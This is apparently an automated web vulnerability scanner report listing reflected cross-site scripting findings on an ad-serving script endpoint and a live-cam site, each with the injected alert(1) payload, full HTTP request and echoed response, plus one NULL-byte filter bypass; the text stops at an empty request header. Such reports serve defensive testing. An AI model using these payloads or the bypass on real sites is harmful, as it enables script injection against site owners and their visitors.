GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px54460'%3balert(1)//d2008572656&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Init690537d3_c9d1_419a_bd60_32f1f3fe5c8c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv690537d3_c9d1_419a_bd60_32f1f3fe5c8c';
       playerDiv.setAttribute(
...[SNIP]...
/main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px;height:250px54460';alert(1)//d2008572656; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2fUS%2fadirect
...[SNIP]...

4.721. http://raw.oggifinogi.com/GetScript.aspx [oggiImpolite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiImpolite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6405c'%3balert(1)//18d1dd4323b was submitted in the oggiImpolite parameter. This input was echoed as 6405c';alert(1)//18d1dd4323b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true6405c'%3balert(1)//18d1dd4323b&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2678

function Initd8941df0_7cc9_48cf_a64e_d6fb8bb75570(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivd8941df0_7cc9_48cf_a64e_d6fb8bb75570';
       playerDiv.setAttribute(
...[SNIP]...
m.de18_1%3bbtg%3dcm.sports_h%3bbtg%3dcm.weath_l%3bbtg%3dbk.rdst1%3bbtg%3dex.32%3bbtg%3dex.76%3bbtg%3dqc.a%3b%7eaopt%3d3%2f0%2fee%2f0%3b%7esscs%3d%3f%22%7d');
       playerDiv.setAttribute("impolite", 'true6405c';alert(1)//18d1dd4323b');
       playerDiv.setAttribute("expandedMode",'');
       
       
       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var
...[SNIP]...

4.722. http://raw.oggifinogi.com/GetScript.aspx [oggiSite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4322'%3balert(1)//880bad4c955 was submitted in the oggiSite parameter. This input was echoed as a4322';alert(1)//880bad4c955 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/a4322'%3balert(1)//880bad4c955 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:55:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2110

function Init6c9d51ce_ebb3_47b3_9d1f_8f7021d9283c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv6c9d51ce_ebb3_47b3_9d1f_8f7021d9283c';
       playerDiv.setAttribute(
...[SNIP]...
6tp%3d5%26forced_click%3d%22%7d');
       playerDiv.setAttribute("impolite", 'true');
       playerDiv.setAttribute("expandedMode",'');
       playerDiv.setAttribute("referrer", 'http://www.bostonherald.com/track/a4322';alert(1)//880bad4c955');window.isIframe = true;
       
       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var html = document.getElements
...[SNIP]...

4.723. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a182"%3balert(1)//e1b39971356 was submitted in the oggiVary parameter. This input was echoed as 7a182";alert(1)//e1b39971356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=7a182"%3balert(1)//e1b39971356&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Initb42795e8_a512_4e2d_af51_815adee5da41(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivb42795e8_a512_4e2d_af51_815adee5da41';
       playerDiv.setAttribute(
...[SNIP]...
<scr" + "ipt type='text/javascript' src='http://static-cdn-cf.oggifinogi.com/prod/PlayerLoader7a182";alert(1)//e1b39971356_4.9.9_2011_01_12.js'>
...[SNIP]...

4.724. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4ea'%3balert(1)//c6fa5b63d0 was submitted in the oggiVary parameter. This input was echoed as 9e4ea';alert(1)//c6fa5b63d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=9e4ea'%3balert(1)//c6fa5b63d0&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2704

function Init77050115_b488_400e_8d8a_f4f42215e5f6(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv77050115_b488_400e_8d8a_f4f42215e5f6';
       playerDiv.setAttribute(
...[SNIP]...
c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px;height:250px; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '9e4ea';alert(1)//c6fa5b63d0');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2fUS%2fadirect%2fbestbuy%3fcmd%3dBBFBStaticContent%26id%3dcontent%2fcatalog%2ftruesoluti
...[SNIP]...

4.725. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fca5'%3balert(1)//6b02666133 was submitted in the oggiWidth parameter. This input was echoed as 4fca5';alert(1)//6b02666133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px4fca5'%3balert(1)//6b02666133&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2704

function Initb6eb1445_e00f_4076_8278_5045fedb286c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivb6eb1445_e00f_4076_8278_5045fedb286c';
       playerDiv.setAttribute(
...[SNIP]...
Url", 'http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px4fca5';alert(1)//6b02666133;height:250px; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2
...[SNIP]...

4.726. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c3e"%3balert(1)//0b5372e35f5 was submitted in the oggiWidth parameter. This input was echoed as 60c3e";alert(1)//0b5372e35f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px60c3e"%3balert(1)//0b5372e35f5&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Initbc98c806_2c1e_48b1_9d3c_28ad71063ff3(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivbc98c806_2c1e_48b1_9d3c_28ad71063ff3';
       playerDiv.setAttribute(
...[SNIP]...
<div id='oggiPlaceholderbc98c806_2c1e_48b1_9d3c_28ad71063ff3' style='width:300px60c3e";alert(1)//0b5372e35f5;height:250px;'>
...[SNIP]...

4.727. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: spvdr=vd=591f9b95-a40e-412c-8b3f-904dd62e2a06&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21036
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.728. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

